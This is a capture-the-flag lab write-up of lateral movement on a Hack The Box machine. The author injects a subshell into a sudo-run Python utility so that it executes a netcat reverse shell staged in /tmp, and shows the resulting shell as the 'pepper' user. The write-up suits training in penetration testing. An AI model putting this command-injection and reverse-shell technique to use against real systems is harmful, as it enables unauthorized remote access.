InfoSec LAB

Jarvis_Lateral_Movement

Created: 2 min read

pepper

As I analyzed the Python script, /var/www/Admin-Utilities/simpler.py , I may be able to use the subshell $() to execute an arbitrary command inside the script

Since I cannot use any blacklisted character, I would better off create an executable to call

www-data@jarvis:/tmp$ echo 'nc 10.10.14.11 8888 -e /bin/bash' > lm.sh ; chmod 777 /tmp/lm.sh
www-data@jarvis:/tmp$ cat lm.sh
nc 10.10.14.11 8888 -e /bin/bash

I made a bash script with a Netcat reverse shell command in it and saved it to the /tmp/lm.sh file I will use this to get a shell session as the pepper user

www-data@jarvis:/tmp$ sudo -u pepper /var/www/Admin-Utilities/simpler.py -p
***********************************************
     _                 _                       
 ___(_)_ __ ___  _ __ | | ___ _ __ _ __  _   _ 
/ __| | '_ ` _ \| '_ \| |/ _ \ '__| '_ \| | | |
\__ \ | | | | | | |_) | |  __/ |_ | |_) | |_| |
|___/_|_| |_| |_| .__/|_|\___|_(_)| .__/ \__, |
                |_|               |_|    |___/ 
                                @ironhackers.es
                                
***********************************************
 
enter an ip: $(/tmp/lm.sh)

I executed the Python script as the pepper user with the sudo privileges and put the subshell with the malicious bash script in it The script just hangs

┌──(kali㉿kali)-[~/archive/htb/labs/jarvis]
└─$ nnc 8888       
listening on [any] 8888 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.10.143] 51618
whoami
pepper
hostname
jarvis
ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.10.10.143  netmask 255.255.255.0  broadcast 10.10.10.255
        inet6 fe80::250:56ff:feb9:be29  prefixlen 64  scopeid 0x20<link>
        inet6 dead:beef::250:56ff:feb9:be29  prefixlen 64  scopeid 0x0<global>
        ether 00:50:56:b9:be:29  txqueuelen 1000  (Ethernet)
        RX packets 1502274  bytes 299571648 (285.6 MiB)
        RX errors 0  dropped 41  overruns 0  frame 0
        TX packets 1486878  bytes 614864094 (586.3 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1  (Local Loopback)
        RX packets 4812  bytes 550091 (537.1 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 4812  bytes 550091 (537.1 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

But I got a shell on the other side. Lateral Movement to the pepper user

Interactive Graph View

Backlinks